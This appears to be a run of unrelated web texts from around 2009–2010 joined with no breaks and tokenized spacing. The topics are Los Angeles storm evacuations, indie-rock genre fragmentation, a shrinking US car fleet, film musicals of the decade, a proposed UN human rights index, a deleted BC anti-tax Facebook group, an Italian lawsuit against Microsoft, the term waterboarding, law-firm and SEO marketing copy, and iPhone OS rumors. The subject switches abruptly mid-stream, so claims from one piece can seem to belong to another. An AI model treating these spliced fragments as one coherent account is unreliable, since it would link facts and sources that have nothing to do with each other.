[ Updated at 1:53 p.m. : The California Highway Patrol closed Interstate 5 at the Grapevine because of snow .
The Cajon Pass remained open , but motorists reported extremely poor visibility on the mountain roadway that provides access to Victorville , Barstow and eventually Las Vegas . ]
According to the National Weather Service , today 's storm -- the third in as three days -- is expected to dump 1 to 2 inches of rain in the L.A. basin and valley areas and 3 to 4 inches in foothill and mountain areas .
In anticipation of mudslides , the Los Angeles Police Department issued evacuation orders in the northeastern San Fernando Valley , where residents in 262 homes were supposed to leave by 9 a.m .
" We 're asking you to please cooperate , " Los Angeles Mayor Antonio Villaraigosa said at a news conference at Fire Station 81 in Panorama City .
" There 's too many people not heeding advice . "
Also , this morning authorities planned to order the evacuation of about 500 homes in La Crescenta , La Cañada Flintridge and Acton .
The evacuations were to begin at 9 a.m. and be completed by 1 p.m .
A full list of the addresses of homes affected by the evacuation is available on the Coordinated Agency Recovery Effort ( CARE ) website .
Officials said the evacuations will likely remain in effect through Monday morning .
Glendale ordered more than 300 homes evacuated .
[ Updated at 12:20 p.m. : Two Southwest Airlines Boeing 737s were struck by lightning during their flights today but landed safely at Bob Hope Airport in Burbank .
One flight attendant who complained of pain in her arm was taken to a hospital for examination , authorities said .
The airliners , which were flying to Burbank from Sacramento and Oakland , landed at 9:38 a.m. and 9:57 a.m. , said Marilee McInnis , a spokeswoman for Southwest Airlines .
Both planes were taken out of service to check for possible damage .
Warning that lives could be at risk , Villaraigosa pleaded today with residents in mudslide - prone foothill areas to evacuate and said the city could be looking at a “ La Conchita situation ” if the intense rains move in as forecast .
Ten people were killed in La Conchita in 2005 when the hillsides above the small Ventura County community came down .
Joined at a late - morning news conference by Police Chief Charlie Beck and Fire Chief Millage Peaks , the mayor said that hillside communities from Glendale to Sunland were at the greatest risk .
“ We ’re asking you to work with us on this , ” the mayor said . ]
In the quiet and fog - covered La Cañada - Flintridge neighborhood of Paradise Valley , Debby Mahoney , 57 , stood in front of her Bristow Drive home during one of the brief interludes from the heavy rain .
Two Los Angeles County sheriff 's deputies approached her and one of them carried a form .
But Mahoney , a business manager , told them she had already signed the form , which confirmed her decision not to heed the evacuation order .
She reasoned she would be safe from flooding or mudslides since her home is located on a hill and one of the many debris basins is beneath the hill .
“ It ’s not logical that gravity goes up hill , " she said .
Months earlier , she had evacuated when the Station fire brought raging flames feet away from her home .
But this time she plans to stay at home with her four cats .
“ A hotel room with four cats ; what a mess , ” Mahoney said .
“ We have a generator and lots of food ; there ’s no reason to leave . ”
So far , two fatalities have been blamed on the series of storms .
An El Cajon woman was crushed to death Tuesday afternoon when the passing storm uprooted a tree , which fell on her .
On Monday night , a 100 - foot tree crashed to the ground in Frazier Park , crushing a man and his home .
Tuesday 's storm was brief and intense , as coastal areas were subjected to hail , thunder , lightning and powerful winds for about two hours before giving way to sunshine and rainbows .
The National Weather Service recorded at least one tornado , four waterspouts and gale - force winds of up to 80 mph as the fast - moving storm swept through the Los Angeles Basin .
Some witnesses said they spotted tornadoes in Costa Mesa and Goleta .
The force of the storm ripped several roofs off buildings , shattered windows and displaced about 40 people in San Pedro .
Chest - high water gushed through the streets so quickly that it stranded drivers on the 710 Freeway in Long Beach and swallowed cars in parts of Belmont Heights .
Rescue crews spent hours in Long Beach and Orange County plucking residents out of flooded cars and homes .
Lightning struck the ConocoPhillips refinery in Wilmington , sparking a small fire in one of the stacks .
Wind swept through Costa Mesa and took chunks of several buildings with it .
A possible tornado " touched down on the building across from us and ripped off the paper and insulation and flung it into the street , landed into our building and ripped the skylight off , " said Charlie Rose , 29 , publisher of independent music magazine L.A. Record , whose office is in Costa Mesa at Whittier Avenue and 17th Street .
At Peter 's Landing Marina in Huntington Harbor , manager Scott Seaton watched through the window as a " cyclone " came over the building and touched down in the marina .
At one point , Seaton watched it pick up a 40 - foot catamaran , twirl it several feet in the air , then drop it on top of another boat .
" It was just amazing watching that thing dance up in the air , " Seaton said .
" As quick as it came , it was gone .
I can't even imagine seeing a monster one because this thing seemed so powerful .
...
It was just unbelievable . "
Chad Zarndt said he felt " violent shaking .
I 've never seen anything like this here in O.C. "
Nearby , the tornado lifted a parked SUV and sent it crashing to the ground , shattering windows .
In Long Beach , the problem was rising water .
Isaac Chavira , 25 , who lives in a two - bedroom , ground - floor apartment at 8th Street and Bennett Avenue , said he had just put his 19 - month - old daughter down for a nap around noon when brown muddy water started seeping through under door .
He peered out the window and saw water and debris running down the street " like a river . "
Eventually , the water reached his shins .
" I kind of panicked , " he said .
He opened the windows and yelled , " What do I do ? " to his neighbors .
-- Ann M. Simmons in La Cañada Flintridge and Richard Winton in Los Angeles
Map image : National Weather Service
View our storm coverage on an interactive map , which we will be updating throughout the evening .
More breaking news in L.A. Now :
L.A. City Council extends restaurant smoking ban to outdoor cafes , effective next year
Thousands of residents without power as storm batters L.A. region
L.A. Council to study giving new mothers room to breastfeed in city buildings
Two planes bound for Burbank struck by lightning
Montebello police chief resigns amid discrimination lawsuit filed by officers
You can see it in the cream that rises to the top of the blogosphere : the elaborate , stylized multiculturalism of Dirty Projectors ( inevitably slotted as Afro- indie ) and Beirut ( Balkan indie - folk ) ; the painstaking historicism of the xx ( neo - shoe - gaze ) or the Crocodiles ( noise - pop ) ; the proud chaos of Health ( noise - rock ) and crusty , lo -fi approach of Wavves ( whose species designation is a rude application of the “ - gaze ” suffix ) .
To identify all the branches of the electronica tree , you might need a couple of genre shirts .
Image Dirty Projectors , a band that received copious critical acclaim in 2009 , though its record sales were dwarfed by the likes of Lady Gaga .
Credit ... Michael Nagle for The New York Times
It was n’t always this way .
Well into the 1990s all but the most omnivorous listeners encountered a much narrower field of sounds .
You had your suburban hard - core punks , your collegiate jangle - poppers , your London and New York art - rockers , your grunge and industrial bands , and so on .
New scenes took years to establish , building up identifiable audience factions before reaching the end of their life cycle .
Now that process is often compressed into a few months , as bloggers , indulging quirky , contrarian tastes , at times hype undeveloped bands into an illusory , small - pond kind of fame , then discard them once their novelty fades .
( Heard of Washed Out or Neon Indian ?
No ?
Those groups were among 2009 ’s biggest blog phenoms . )
All those leftover genre names become digital epitaphs to stillborn movements .
But the Internet is n’t the whole story ; indie - rock ’s fragmentation is also traceable to the decline of the major labels , whose contracts used to serve as commercial goals , as well as to reduced music coverage on MTV , which used to serve as a central musical agora .
Without those anchors , the independent fringe has drifted ever further from mainstream tastes .
The downside is n’t hard to see .
What was once always on the brink of something bigger has become Balkanized , and the process of genre subdivision has hidden away bands in ever tinier and more obscure pigeonholes , affecting even the best and most widely known among them .
Dirty Projectors , for example , has had about as much acclaim as any indie- rock band could hope for in 2009 , even landing on the cover of New York magazine , and yet sales of their latest album , “ Bitte Orca ” ( Domino ) , are only about 50,000 copies , less than Lady Gaga sells in a week .
|
2009 was not a good year for car sales .
No surprises there .
An interesting side effect of lowered sales last year , though , is that the total number of vehicles in the overall U.S. car fleet dropped .
There were 250 million cars here in 2008 , and only 246 million at the end of 2009 .
We may have been buying fewer cars than we usually do in a year – there were around 10 million sold in 2009 – but we still got rid of 14 million units .
Lester Brown , president of the Earth Policy Institute , will be speaking to reporters Wednesday about why he thinks these numbers mean that " America 's century - old love affair with the automobile may be coming to an end . "
Part of Brown 's reasoning is that he sees the shrinking U.S. fleet trend continuing through 2020 thanks to market saturation , economic uncertainty and a " declining interest in cars among young people who have grown up in cities , " among other factors .
The end result ?
Brown believes the shrinking fleet " will also largely eliminate the need for building new streets and highways , and will set the stage for increased investment in public transit and high - speed intercity rail . "
Is Brown on to something , or will a widely - expected rebound in new car sales due to pent - up demand render his argument spurious ?
Check out the EPI 's press release after the jump , then be sure to leave your thoughts on the matter in ' Comments . '[ Source : Earth Policy Institute Image : kodiax2 - C.C. License 2.0 ]
After a Century of Growth , U.S. Fleet Entering Era of DeclineWASHINGTON , DC – Lester Brown , president of the Earth Policy Institute , will report that America 's century - old love affair with the automobile may be coming to an end during a teleconference with reporters on Wednesday , January 6th at 11:00 AM EST .
In 2009 , the 14 million cars scrapped exceeded the 10 million new cars sold , shrinking the U.S. fleet by 4 million - nearly two percent in just one year .
The U.S. fleet , totaling 250 million in 2008 , dropped to 246 million in 2009 .
Brown thinks this shrinkage will continue through 2020 .
Brown says there are several reasons for this decline .
" One is market saturation .
The United States now has 246 million registered motor vehicles and 209 million licensed drivers - nearly 5 vehicles for every 4 drivers .
Other reasons for the U.S. car fleet shrinkage are ongoing urbanization , economic uncertainty , oil insecurity , the prospect of higher gasoline prices , the rising costs of traffic congestion , mounting concerns about climate change , and the declining interest in cars among young people who have grown up in cities .
" This shrinkage in the national fleet combined with gains in fuel efficiency will steadily reduce U.S. oil consumption and carbon emissions .
It will also largely eliminate the need for building new streets and highways , and will set the stage for increased investment in public transit and high - speed intercity rail .
WHAT : Teleconference with Lester Brown on the shrinking U.S. car fleetWHO : Lester Brown , founder and president of the Earth Policy Institute and author of Plan B 4.0 : Mobilizing to Save CivilizationWHEN : Wednesday , January 6 at 11:00 a.m. , EST
Celluloid Heroes : Eight Musicals of the 21st Century
A funny thing happened this decade — the once dying genre of live - action movie musicals seems to have returned to the movie repertoire .
As the decade closes , I can think of exactly two major westerns , but I keep remembering musicals that I should consider for this piece ( including the mostly well - regarded French musical “ Love Songs , ” which I forgot to see before writing this , je suis désolé ) .
As a lifelong fan and a nearly lifelong tough critic of musicals , I love most of these films .
However , this list is not so much a traditional “ best of ” and I ’ve included one choice I definitely do n’t like .
( It wo n’t be hard to guess which . )
These are musicals that I think contributed to the development of this polarizing and hard to pull off genre .
They do n’t hark back to times gone by or try to recapture a past glory that will never return , but actually take us into the future .
That ’s important now that musicals seem to have a future .
“ Dancer in the Dark ” ( 2000 )
Earlier this year , the brilliant but often irritating Danish director Lars von Trier shocked hard - to - shock European festival audiences with graphic sexual violence in “ Antichrist . ”
Back in 2000 , all he needed to divide audiences was some really intense melodrama and an approach to making dark musicals partially borrowed from TV creator Dennis Potter ( “ Pennies from Heaven , ” “ The Singing Detective ” ) .
Featuring a literally once - in - a - lifetime lead performance by singer - songwriter Björk as a young mother ready to sacrifice everything to save her son ’s failing eyesight , “ Dancer in the Dark ” is maybe the most emotionally potent story of parental love I ’ve ever seen .
As a musical , it ’s strange and arresting .
Like the Potter television shows and movies and “ Chicago , ” further down the list , the musical numbers take place in the mind of the lead character .
In this case , however , it is particularly poignant as our heroine is a fan of musicals who , though she is gradually going blind , is attempting to appear in a community theater production of “ The Sound of Music . ”
Below , she musically confesses her situation to a smitten Peter Stormare ( yes , the guy from “ Fargo ” ) .
Lumberjacks or not , “ Seven Brides for Seven Brothers ” sure seems like a long time ago .
Moulin Rouge ” ( 2001 )
As the non-musical Pixar films became the dominant template for animation and the musical form lost its last apparent movie bastion , big studios began to experiment with musicals starring humans .
Unfortunately for me , the first and still one of the most popular of this decade ’s high profile film musicals was Baz Luhrmann ’s beautifully shot , amazingly designed , dull - witted , and over - edited “ Moulin Rouge . ”
Yes , this musical fan is not a fan of the musical that ’s been credited with resurrecting the genre .
Why ?
A couple of sequences work , but on the whole I expect the funny parts of a movie to make me laugh and , even more important , I like to see the movies I ’m seeing .
As far as I can tell , Luhrmann simply does n’t have the confidence in this film to allow us time to view the arresting images he ’s worked so hard to craft , nor does he permit time to actually see the hard work his dancers and actors put in .
Editor Jil Bilcock is expected to do all the performing instead .
As for what Luhrmann and his arrangers did with the various classic songs they threw into a musical Cuisinart , the less I say about it the better .
At the risk of sounding like a fogey ( or a member of an 18th century Austrian court ) , too many notes .
Way , way , way , too many notes .
See if you disagree .
“ Hedwig and the Angry Inch ” ( 2001 )
John Cameron
Mitchell pulled off a tremendous coup in adapting his stage hit , “ Hedwig and the Angry Inch ” into a film that , though something of a cult success , is still vastly under - recognized .
The live “ Hedwig ” was essentially a rock concert combined with a one - person show , so turning it into a relatively conventional dramatic movie meant adding a great deal of new material .
Working on a very modest budget and studying his Fosse , he crafted a new kind of music film that blended wondrous David Bowie / T - Rex - style glam rock composed by Stephen Trask , outrageous comedy , and some fairly searing drama with imaginative performance sequences and elements of more traditional musical theater .
That same year , Todd Haynes ’ historical musical , “ Velvet Goldmine , ” explicitly tried the same thing on a much larger , vastly less humorous , scale with a fictionalized story of the glitter rock era .
It ’s actually a terrific movie in many respects , but it did n’t have the needed emotional resonance or connect with an audience in the same way as “ Hedwig . ”
Here , Hedwig , the lonely but unflaggingly flamboyant East German not - quite - transsexual victim of a badly botched sex change operation , experiences a wondrous musical rebirth just as the Berlin Wall falls .
This , my friends , is one way to shoot a musical number on a budget .
It starts a bit downbeat and slow , but it rewards a little patience .
Hedwig & the Angry Inch – Wig in a Box
| MySpace Video
“ Chicago ” ( 2002 )
After “ Moulin Rouge ” became a surprise hit on DVD , it was decreed somewhere that most musicals should be over - edited ADHD extravaganzas .
Largely because he had a brilliant adaptation by Bill Condon to work with , director Rob Marshall actually could have done a lot worse with “ Chicago . ”
It ’s a movie I like very much , even though it was so over - cut that I wondered if Marshall was trying to hide the fact that , as dancers go , Renee Zellweger and Richard Gere ca n’t really be expected to be Fred Astaire and Cyd Charisse .
Since he shot his next film , the non-musical melodrama , “ Memoirs of a Geisha , ” in almost the same way , I ’m still not sure .
Bob Fosse , easily one of my four or five favorite directors , basically invented the highly edited musical comedy sequence with his first film , 1969 ’s “ Sweet Charity . ”
However , first and foremost a dancer and choreographer himself , he never lost site of the action even as he jazzed up the presentation in brilliant new ways .
In adapting the choreography Fosse created in the seventies for the original stage show of “ Chicago , ” Marshall loses something .
Even with a group of first rate dancers , including Catherine Zeta -Jones , he can’t hold a shot for more than a second .
The miracle is the following signature sequence from the film still works , but I ’m convinced it would be even better if only he ’d laid off the cine - caffeine a little .
( “ Cell Block Tango ” starts at 2:07 . )
“ Colma : The Musical ” ( 2006 )
Things were pretty slow in the way of half - way decent musicals during the middle of the decade .
Christopher Columbus ’s take on “ Rent ” was about as uninspired as you would expect and had me wondering why anyone liked the original show .
The freakishly candy - colored direction of Joel Schumacher , which we all remember so well from his Batman movies , was combined with Andrew Lloyd Weber ’s mock - classical dirges to make for a completely unwatchable “ Phantom of the Opera ” ( I know this is true because I was completely unable to make myself watch more than a half hour of it . )
Bill Condon ’s attempt at duplicating Rob Marshall ’s directing style on “ Dreamgirls ” was a lot better , but still just okay except for truly first - rate performances by Eddie Murphy and some great singing by Jennifer Hudson .
I had an excuse to skip “ High School Musical ” because it was only a TV movie at the time .
And then , from a San Francisco suburb this lifelong Californian had never heard of , came one of those rare surprises that makes this whole cinephile / film critic thing worthwhile .
A collaboration between first - time director Richard Wong and singer - songwriter - actor - screenwriter H.P. Mendoza , “ Colma : The Musical ” builds on the low - budget inventions of “ Hedwig ” by adopting the traditional singing - for - no - reason musical to the zero - budget aesthetic .
Brazenly getting around all the traditional problems with film musicals by taking a fresh , eye level approach to musical numbers and simply refusing to apologize for the fact that its characters have a weird habit of singing with an invisible power - pop band , “ Colma ” was also a musical version of maybe half the zero - budget indies ever filmed .
A story of three eighteen year - old friends adjusting to adulthood and fraught relationships with lovers , family , and each other , it tends to drag a bit whenever the music stops .
Fortunately , there ’s lots of very smart pop music by Mendoza , whose style recalls They Might Be Giants and Amy Mann .
After a good - but - not - great opening , the film explodes with a true single - take wonder : an eight minute , two - song “ oner ” that is eight of most fun minutes of any movie of the decade as far as I ’m concerned .
Unfortunately , I ca n’t show you even part of that here , or any of Wong and Mendoza ’s other fine music sequences .
However , some unembeddable clips can be found on YouTube .
You can also read what I wrote about “ Colma : The Musical ” a couple of years back here .
But first , check out the trailer .
It ’s pretty cool .
“ Once ” ( 2007 )
Of course , if you find making an old - school break - into - song musical a bit too much , you can always find a story about people who would actually perform music in real life and then simply not cut - away during the songs .
You could call it the coward ’s way out , but if it was good enough for Bob Fosse in “ Cabaret , ” it ’s good enough for anyone else .
And no film in recent years has used this approach more effectively than this gentle semi-romantic drama about a pair of street musicians , both with strong attachments to absent lovers , who meet and find happiness together — musically , that is .
With a dash of “ Brief Encounter ” and little bit of “ The Commitments , ” “ Once ” cast quite a spell .
Well , on me and a lot of people , but not everyone .
Still , even though the music by stars Glen Hansard and Markéta Irglová is often haunting but not entirely my personal cup of ultra - laid - back modern folk , writer - director John Carney ’s warmly matter of fact approach to the simple pleasure of musical perfomance made this cozy , joyful , and poignant little hang - out movie impossible to forget .
Sorry , I could n’t find any decent clips — or even a trailer I liked — online .
Here , have a photo instead .
“ Sweeney Todd ” ( 2007 )
The risky but logical choice of having Tim Burton , a past master of non-musical stylization , adapt Stephen Sondheim ’s dark musical masterpiece , “ Sweeney Todd , ” paid off in into a movie musical that was both unprecedented and old - fashioned , blending classical horror techniques going back to the 1930s with a straightforward approach to the musical drama and an awful lot of blood for a musical .
Though I had concerns about casting two actors not especially known for their musical theater abilities in the lead roles , Johnny Depp proved to be a strong enough singer and a great enough actor that it was n’t a problem ; Helena Bonham Carter , if no Angela Lansbury , held her own rather and the supporting cast was first - rate .
As for Burton , for once his genius with the design elements of the film was matched with some geniuinely great material .
The best part was that Burton had no problem keeping things simple and letting the drama and suspense just play itself out , as in this brilliant duet of would - be murder between Depp and Alan Rickman ( a better singer than you ’d expect ) as the vile Judge Turpin .
Here , Sweeney learns that revenge may be a dish best served warm after all .
“ Dr. Horrible ’s Sing - Along Blog ” ( 2009 )
Purists might scream , I suppose , that since it ’s primarily been viewed on the Internet , this effort by Joss Whedon and various friends and family members does n’t qualify as a movie .
All I can say is that it has screened at the American Cinematheque and it ’s never been on TV , and I say that makes it a movie , damnit .
What , you interject , I already included this in my “ TV in the 2000s ” entry on Joss Whedon ?
To that , I can only say , “ posh ! ” and “ balderdash ! ” and “ who cares what you think little accuracy person ? ”
Just be grateful I could n’t figure out how to shoehorn the musical “ Buffy ” episode in here , too — ’ cause I was thinking about it !
Okay , before I get any more carried away over - channeling Joss Whedon ’s sense of humor , I ’ll tell you that the real reason I ’m including this is because I really do believe that , as much as any film here , the combination of DIY financing and highly professional talent makes “ Dr. Horrible ” one intriguing pathway to the future of musicals and , because of how it was presented , the future of entertainment in general .
Moreover , the Whedon clan understands an awful lot about entertainment and , without resorting to fancy tricks they sell a very silly musical tragicomedy about a lovesick aspiring supervillain ( played by musical theater pro and comedy genius Neil Patrick Harris ) and fill it with social satire , shticky jokes , and sadness .
In others words , if you simply commit you can tell just about any story .
There ’ll be a sequel to “ Dr. Horrible , ” but perhaps its example is just as important .
The future of musicals is wide open and anyone can make one .
Sure , not everyone can make a good one , but anyone can try and more people should .
It ’s a brand new day .
Human Rights
Day is the anniversary of the signing of the Universal Declaration of Human Rights ( UDHR ) on 10 December 1948 , one of the most important documents in human history .
Drafted by representatives from many countries and cultures , and endorsed today by all 192 member states of the United Nations , it embodies a global humanitarian consensus .
Rejecting the doctrines of cultural and moral relativism , which have long been promoted by imperialists and , more lately , by some advocates of anti-imperialism , the UDHR asserts that all peoples in all cultures are entitled to the same rights and freedoms .
The big problem is adherence and enforcement .
The UDHR is a noble document but even western democracies like the UK and US fall short of its ideals .
Britain has house arrest without charge , libel laws that inhibit free speech and restrictions on the right to peaceful protest near parliament .
Many US states still have the death penalty and people merely suspected of terrorism have been kidnapped , tortured and detained without trial at the behest of the US government .
Other grave human rights abuses – such as religious persecution , ethnic cleansing , media censorship , rigged elections and trade union suppression – are widespread in many countries , including Saudi Arabia , Belarus , Uganda , Zimbabwe , China , Iran , Burma , Sudan , Russia , Pakistan and Iraq , to name just a few .
There is , however , no objective , transparent measure to determine a country 's conformity to , or departure from , human rights norms .
These deficiencies need to be addressed if the international community is to secure human rights progress .
We need benchmarks against which all countries can be measured , without fear or favour .
There is no easy way to ensure that the principles of the UDHR are upheld by UN member states but the power of publicity and moral leverage should not be underestimated .
Even tyrannies are conscious of their image and seek to avoid opprobrium .
This is why the Green party of England and Wales is advocating a UN Global Human Rights Index , as a means of measuring and ranking human rights abuses , country by country .
The aim is to create a human rights league table to pressure governments to clean up their record .
" Our proposal makes the case for the UN to publish an annual Global Human Rights Index , detailing the human rights performance of each and every government on the planet , displayed in a league table form , " said Dr Richard Lawson , Green party member and founder of the campaign for the Global Human Rights Index .
Speaking at the launch of the index idea last year , he said : " This will enable the relative human rights standing and trends of each country to be seen at a glance .
It would add pressure on the worst ranked countries to improve their human rights record . "
Since the index idea was first mooted , interest has been expressed by campaigners with World Concern , Global Action Plan to Prevent War , World Disarmament Campaign , Arms Reduction Coalition , Culture Change and the Movement for the Abolition of War .
We are planning to approach the United Nations Association , the Foreign Office and the European Union .
The current draft of the index was finalised in 2008 .
Over many months , I worked with Lawson to map out the rights and freedoms to be covered by the index , and how the ranking system would be calculated .
What we have devised is a draft outline , open for discussion , negotiation and further refinement .
Using a points system , the index measures every country , based on its compliance with a checklist of 52 human rights norms , such as whether or not it has the death penalty , torture , detention without trial , freedom of the media , the right to protest and equal rights for women and for ethnic and sexual minorities .
This would enable objective comparisons between the human rights records of different countries and whether each country 's record is improving or deteriorating .
The human rights trend of nations over time would therefore be demonstrable and transparent .
This would give an important early warning signal about which states are increasing their human rights violations .
These countries could then be pressed by the UN to remedy the abuses and , if necessary , given assistance to do so – perhaps in the form of UN peacekeepers , in instances of ethnic or religious violence .
At present , repressive states are dealt with in an arbitrary and ad hoc way by politicians , often through media manipulation .
Iran 's regime is deservedly condemned , while there is barely a squeak of protest about the equally gross human rights violations by a western ally like Saudi Arabia .
The UN 's failure to tackle human rights - abusing nations will be harder to justify or ignore if the index clearly ranks them as major abusers .
Conversely , the unfair or excessive demonisation of a particular country will be less easy to accomplish if the index can show that it is not the worst offending state or if the index can demonstrate that the accusing states also have a less than exemplary human rights record .
The index could be cited as evidence to justify UN legal action and targeted UN sanctions against the very worst offenders .
This might act as a wake - up call to regimes near the bottom of the index .
Knowing that they could be next in line for prosecution and sanctions , their leaders might decide to take pre-emptive action to improve their observance of human rights .
The index will not prompt every country to reduce its human rights violations .
Certain tyrannies are likely to carry on regardless .
But the index might encourage some nations to make improvements .
However small , any betterment of human rights is a gain for people whose rights have been previously abrogated .
Britain and the EU have the power and influence to take the index proposal to the UN and get it discussed .
Over to you , David Miliband and Catherine Ashton .
As of Friday January 29th , 2010 a popular protest site disappeared from Facebook , called No BC HST
No BC HST
The site had over 130,000 members .
The HST tax is a harmonized sales tax that would see the tax shift move from corporations to individuals , and is viewed as a tax grab for the Conservative Federal and BC Liberal Governments .
It should be noted , provincially , Liberal governments tend to be right of centre
The founder of the protest group blogged about this the mysterious disappearance .
Bill Tieleman : Why did BC 's biggest Facebook group disappear ?
What is more interesting about Bill 's blog are the comments below :
Anonymous said ...
A cached version is still available ( albiet useless ) .
The site was apparently taken down on 29 Jan 2010 11:29:47 GMT .
Both the State University of New York and the University of Florida , among others , had their Facebook pages removed under similar circumstances .
A guy by the name of Brad J. Ward from BlueFuego.com , with his inside contacts at Facebook , assisted both universities in restoring their pages .
http://bluefuego.com/
You might want to try that avenue as Facebook customer assistance is basically useless .
Anonymous said ...
Some one is , desperately afraid , their many sins will come to light , and disgrace them , in front of the entire world .
The , Olympic Games , are very near , and images , must be preserved , very much the same as the RCMP , tries to preserve their image .
There is nothing beneath their dignity .
They have to resort to dirty tactics , because the truth , at times , would put them in prison
Further to the idea that Olympics - era cyber - subterfuge is afoot , another Wikipedia editor just this evening ( while I was commenting about the disappearance of NO BC HST on the FB anti-prorogation page ) caught some blankings of critical information and reversed them : http://en.wikipedia.org/...
Scroll down to the green - highlighted sections as to what had been removed .
Note also the red changes in the yellow sections , which rendered the links they 're in in workable ... but also left a " footprint " , sort of a " I was here " .... does " Daws " mean anything to anyone here .
I 've raised the question of whether the IP user who made those deletions is an operative of a BC government agency / office , political party , consulting / p.r. company or some such similar , no replies yet .
There IS a blacklist of government / corporate - related IP addresses ; this appears to have been done by a proxy server , i.e. behind a mask .....
It is true with the Vancouver 2010 Olympics just days away the government is using security fears to sensor any group that may appear anti-Olympic or Anti-government .
BC has established laws against using certain signage .
CBC : http://www.cbc.ca/...
09bc-anti-olympic-sign-law-bccla.html
A proposed B.C. law would allow municipal officials to enter homes to seize unauthorized and possibly anti-Olympic signs on short notice , civil libertarians say .
Violators could be fined up to $ 10,000 a day and jailed up to six months , the B.C. Civil Liberties Association said Friday .
The proposed law was introduced Thursday as a bill to amend the Municipalities Enabling and Validating Act .
The government said in a statement that the changes will " provide the municipalities of Vancouver , Richmond and Whistler with temporary enforcement powers to enable them to swiftly remove illegal signs and graffiti during the 2010 Olympic and Paralympic Winter Games . "
Read more : http://www.cbc.ca/...
BC can force homeless people off the streets
Advocates for the homeless on Vancouver 's Downtown Eastside are comparing a new law aimed at helping street people to kidnapping .
Legislation passed through the B.C. legislature Nov. 17 gives police the power to take homeless people to shelters during severe weather , but cannot force them inside .
The legislation was called the Assistance to Shelter Act.
Advocates refer to it as the " Olympic Kidnapping Act . "
Read more : http://www.cbc.ca/...
So no response yet from Facebook , and no idea who deleated two protest pages , but what should be noted something is sinister is going on , and this is not just a harmless error .
We have other instances that have made Conservative governments touchy these days .
The Yes Men , sent out a phoney email saying that the Canadian government is going to take drastic action on Global Warming .
http://www.thestar.com/...
They demonstrated their ability to create a stir in December at the Copenhagen climate summit .
Alongside other eco-activists , Bichlbaum and Bonanno posed as representatives of the Canadian government .
Clad in black fedoras and red ties and blazers , they announced that the country would be taking more aggressive action on climate change .
" Nobody benefits from a world in peril , " read the phony press release from Environment Minister Jim Prentice .
" Contributing to the development of other nations and taking full responsibilities for our emissions is simple Canadian good sense . "
The stunt forced Canada into an embarrassing denial :
No , it would not implement the toughest emissions cuts in the world .
And no , it would not commit $ 13 billion to help the world 's poorest countries adapt to a warmer planet .
http://arstechnica.com/...
When corporate pranksters The Yes Men staged a December stunt against the Canadian government 's emission proposals , the group had no idea that the resulting backlash would take down more than 4,000 unrelated websites .
Whatever you think of the hoax , the saga is a reminder of the power of ISPs and Web hosting companies .
If they do n't like what you 're saying and doing , there are often no consequences to shutting down or blocking sites , even when tremendous collateral damage ensues .
The scenario played out in December when The Yes Men and another group called ActionAid staged a hoax aimed at the Canadian government .
They put out press releases and launched official - looking websites at domain names with more than a passing similarity to their official counterparts .
All of the materials said the same thing : on the eve of the international climate change shindig in Copenhagen , Canada was committing itself to the most aggressive emissions reduction targets of any country .
In addition , it was willing to pay developing countries cash to compensate them for dealing with climate change .
None of it was true .
Canada went to Copenhagen with much more modest emissions targets , but soon found itself responding to the hoax and defending its own position on issues like the Alberta oil sands .
The Environment Minister , Jim Prentice ( yes , that Jim Prentice ) , soon had his staff blaming the hoax on the cofounder of an environmental group called Equiterre .
Equiterre angrily denied the charges .
Of course another very popular website in Canada has led to the Conservatives falling in the polls and actually now trailing behind the Liberals .
For more information on this the facebook group , Canadians against Prorogation see my diary here :
http://www.dailykos.com/...
Well stay tuned , something is going on here .
FLORENCE , Italy , Jan 5 ( Reuters ) -
An Italian consumer group is planning a class - action lawsuit against Microsoft Corp MSFT .
O seeking compensation for Windows software pre-installed on computers for people who did not want it .
The Aduc consumer defence association said on Tuesday it would present its case at a court in Florence after Wednesday ’s Epiphany holiday .
The move against Microsoft , the world ’s biggest software company , comes after a law took effect on Friday allowing consumer associations to file suit for groups of consumers .
“ Individual cases affect a limited number of users , ” Aduc Chairman Vincenzo Donvito told Reuters .
“ Therefore , as there is a large number of users involved , and with the importance of the free market issue , we have decided to take a collective legal action against Microsoft . ”
Italian law provides for compensation for costs and not punitive damages .
Microsoft was not available to comment .
Aduc has won a pilot case in a Florence court on reimbursement of the cost of Windows for consumers who had to buy it pre-installed on computers .
( Reporting by Silvia Ognibene and by Sara Rossi in Milan , writing by Marie - Louise Gumuchian , editing by Will Waterman )
It 's not so big a deal in the grand scheme of things .
But language matters .
Here 's a sentence from the New York Times Book Review :
During George W. Bush ’s first term , Yoo served in the Office of Legal Counsel at the Justice Department , where he wrote memos that asserted the president had the power to authorize the use of interrogation techniques like waterboarding , instigate a program of warrantless wiretapping and detain certain enemy combatants without applying the Geneva Conventions .
Waterboarding is not now and never has been , under any legal , moral or historical authority , an interrogation technique .
No one can be " interrogated " with a cloth across their face and water poured over them to bring them to the point of drowning 183 times .
They can merely be tortured , and then their broken psyche can be questioned .
That the NYT , that Isaacson and Tanenhaus , two decent and intelligent and humane people , should now be forced by style manuals to say that torture is something else , suggests how far we 've come .
And how fast .
It is unimaginable , for example , that a book review about , say , the Khmer Rouge , would ever refer to their waterboarding as an " interrogation technique " .
We want to hear what you think about this article .
Submit a letter to the editor or write to letters@theatlantic.com .
In all of these areas , our firm provides effective services to protect your interests and resolve disputes .
Mr. Martin has a proven record of getting results using litigation or negotiation effectively to help clients reach their goals .
If your case involves litigation , Mr. Martin — a skilled negotiator — endeavors to work with all parties to come to an agreeable conclusion .
His reputation for honesty and integrity creates a positive environment in which to discuss resolution .
If compromise is not possible , you will have a lawyer on your side who excels in the courtroom .
That ’s right , y’all .
We ’re back at it , and this time we ’ve received some exclusive iPhone OS 4.0 details from one of our trusty Apple connects .
Here are some iPhone OS 4.0 features , according to our guy :
There will be multi - touch gestures OS - wide .
( Would make sense for that as the rumored OS for the iTablet is close if not the same as the iPhone )
“ A few new ways ” to run applications in the background — multitasking .
Many graphical and UI changes to make navigating through the OS easier and more efficient .
We have n’t had this broken down , but we can only hope for improved notifications , a refreshed homescreen , etc .
The update will supposedly be available for only the iPhone 3G and 3GS , but will “ put them ahead in the smartphone market because it will make them more like full - fledged computers ” more than any other phone to date .
Everyone is “ really excited . ”
The last piece of information is the most vague , but apparently there will be some brand new syncing ability for the contacts and calendar applications .
That ’s all we have for now !
Who ca n’t wait for next Wednesday ?
Thanks , Lindsey !
Extreme customization .
If you have experience with search optimization tools , then you probably know they tend to be very controlling over the ways you can manipulate their data .
Not us .
We give you every single option there is .
You can choose search engines and locations , sort and filter the data any way you like , customize the way the data is presented , and even export it to be used elsewhere .
